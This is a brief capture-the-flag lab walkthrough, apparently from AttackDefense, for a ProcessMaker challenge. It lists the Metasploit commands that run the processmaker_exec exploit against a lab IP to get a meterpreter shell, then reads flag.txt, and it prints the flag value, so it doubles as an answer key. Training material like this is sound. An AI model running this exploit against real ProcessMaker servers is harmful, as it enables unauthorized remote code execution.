Windows_Worflow_Platform
Windows_Worflow_Platform
URL https://attackdefense.com/challengedetails?cid=1946
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Commands:
msfconsole
search processmaker
use exploit/multi/http/processmaker_exec
set RHOSTS 10.0.0.168
exploit
We have successfully exploited the target ProcessMaker application and received a meterpreter
shell.
Command: pwd
cd /
dir
cat flag.txt
This reveals the flag to us.
Flag: a3dcb4d229de6fde0db5686dee47145d
References